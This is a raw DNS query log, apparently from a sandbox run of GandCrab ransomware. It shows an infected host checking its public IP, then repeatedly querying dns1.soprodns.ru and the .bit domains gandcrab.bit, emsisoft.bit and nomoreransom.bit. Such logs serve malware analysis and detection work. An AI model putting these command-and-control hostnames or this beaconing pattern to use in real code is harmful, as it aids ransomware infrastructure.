                                    Sep 1, 2022 00:01:23.064902067 CEST192.168.2.38.8.8.80x6ee5Standard query (0)ipv4bot.whatismyipaddress.comA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:23.994477034 CEST192.168.2.38.8.8.80x76aeStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:24.049179077 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:24.068248034 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:24.090037107 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:24.124614954 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:24.145241976 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:25.247797012 CEST192.168.2.38.8.8.80xb801Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:25.310718060 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:25.328521967 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:25.347117901 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:25.367458105 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:25.385521889 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:26.844472885 CEST192.168.2.38.8.8.80xa52fStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:27.464441061 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:27.482734919 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:27.503001928 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:27.526552916 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:27.550731897 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:33.534245014 CEST192.168.2.38.8.8.80x9347Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:34.150069952 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:34.170593023 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:34.192981005 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:34.214782953 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:34.235760927 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:35.764401913 CEST192.168.2.38.8.8.80x69c7Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:36.800379992 CEST192.168.2.38.8.8.80x69c7Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:37.845704079 CEST192.168.2.38.8.8.80x69c7Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:38.440474033 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:38.460692883 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:38.479108095 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:38.500366926 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:38.529181004 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:39.759217024 CEST192.168.2.38.8.8.80xc269Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:39.895581007 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:39.931324959 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:39.951734066 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:39.971865892 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:39.990387917 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:41.157733917 CEST192.168.2.38.8.8.80xf1f3Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:41.261158943 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:41.280695915 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:41.302395105 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:41.321666956 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:41.349610090 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:42.602513075 CEST192.168.2.38.8.8.80x8baStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:42.666846037 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:42.686131001 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:42.707643986 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:42.729662895 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:42.750967026 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:43.750798941 CEST192.168.2.38.8.8.80x25e1Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:43.818617105 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:43.838372946 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:43.859132051 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:43.883100033 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:43.903173923 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:44.873297930 CEST192.168.2.38.8.8.80x51fbStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:45.432225943 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:45.451637030 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:45.473540068 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:45.495695114 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:45.515640020 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:46.825660944 CEST192.168.2.38.8.8.80xb432Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:46.895714045 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:46.914019108 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:46.934129953 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:46.954180956 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:46.974641085 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:47.966227055 CEST192.168.2.38.8.8.80x1543Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:48.969243050 CEST192.168.2.38.8.8.80x1543Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:50.027492046 CEST192.168.2.38.8.8.80x1543Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:50.193775892 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:50.247028112 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:50.267332077 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:50.489646912 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:50.543832064 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:52.586035013 CEST192.168.2.38.8.8.80x84Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:53.206665039 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:53.226526976 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:53.251460075 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:53.271847010 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:53.290249109 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:54.258793116 CEST192.168.2.38.8.8.80x1368Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:54.856652975 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:54.875889063 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:54.898417950 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:54.918395996 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:54.940366030 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:55.904305935 CEST192.168.2.38.8.8.80xb069Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:56.898372889 CEST192.168.2.38.8.8.80xb069Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:57.597537994 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:57.617695093 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:57.638087034 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:57.658266068 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:57.681284904 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:58.788856030 CEST192.168.2.38.8.8.80x34aeStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:59.402009010 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:01:59.423880100 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:59.444335938 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:01:59.462826967 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:01:59.483040094 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:00.502871990 CEST192.168.2.38.8.8.80x6c80Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:00.582490921 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:00.604247093 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:00.624524117 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:00.646017075 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:00.665796041 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:01.677488089 CEST192.168.2.38.8.8.80xe958Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:01.768798113 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:01.788641930 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:01.814516068 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:01.832803965 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:01.851233959 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:02.841990948 CEST192.168.2.38.8.8.80xb441Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:02.966444016 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:02.984507084 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:03.004766941 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:03.023139000 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:03.043257952 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:04.111052990 CEST192.168.2.38.8.8.80xf2b7Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:04.748806953 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:04.768620968 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:04.790776014 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:04.820486069 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:04.842170000 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:05.931890965 CEST192.168.2.38.8.8.80x3f9eStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:06.949732065 CEST192.168.2.38.8.8.80x3f9eStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:07.982110023 CEST192.168.2.38.8.8.80x3f9eStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:10.088450909 CEST192.168.2.38.8.8.80x3f9eStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:11.685623884 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:11.706173897 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:11.726578951 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:11.746819973 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:11.767488003 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:12.846661091 CEST192.168.2.38.8.8.80xfea3Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:13.892630100 CEST192.168.2.38.8.8.80xfea3Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:14.908216953 CEST192.168.2.38.8.8.80xfea3Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:14.995146036 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:15.015451908 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:15.036326885 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:15.057233095 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:15.078815937 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:15.420219898 CEST192.168.2.38.8.8.80x80a9Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:16.408524990 CEST192.168.2.38.8.8.80x80a9Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:16.468611002 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:16.489371061 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:16.509694099 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:16.532569885 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:16.558553934 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:16.953728914 CEST192.168.2.38.8.8.80x731Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:17.000292063 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:17.026690006 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:17.049623013 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:17.069143057 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:17.089606047 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:17.824410915 CEST192.168.2.38.8.8.80x84cbStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:18.368638039 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:18.389777899 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:18.409895897 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:18.428585052 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:18.458137989 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:18.825237036 CEST192.168.2.38.8.8.80x49eaStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:19.409481049 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:19.430994987 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:19.450711966 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:19.472414017 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:19.492209911 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:19.849414110 CEST192.168.2.38.8.8.80xeae8Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:19.932447910 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:19.952318907 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:19.973756075 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:19.994369984 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:20.014611959 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:20.450695992 CEST192.168.2.38.8.8.80xc65dStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:21.440356970 CEST192.168.2.38.8.8.80xc65dStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:22.031480074 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:22.051454067 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:22.069673061 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:22.089884996 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:22.108885050 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:22.575946093 CEST192.168.2.38.8.8.80x4e9Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:23.581091881 CEST192.168.2.38.8.8.80x4e9Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:24.596934080 CEST192.168.2.38.8.8.80x4e9Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:24.728225946 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:24.749273062 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:24.770961046 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:24.792802095 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:24.814615965 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:25.179150105 CEST192.168.2.38.8.8.80x7b7eStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:26.190792084 CEST192.168.2.38.8.8.80x7b7eStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:26.252104998 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:26.273853064 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:26.294404984 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:26.312895060 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:26.333412886 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:26.695220947 CEST192.168.2.38.8.8.80xd306Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:27.750152111 CEST192.168.2.38.8.8.80xd306Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:27.858907938 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:27.883460045 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:27.905128002 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:27.969558001 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:27.993076086 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:29.601125002 CEST192.168.2.38.8.8.80xefc8Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:32.371490955 CEST192.168.2.38.8.8.80xefc8Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:32.404072046 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
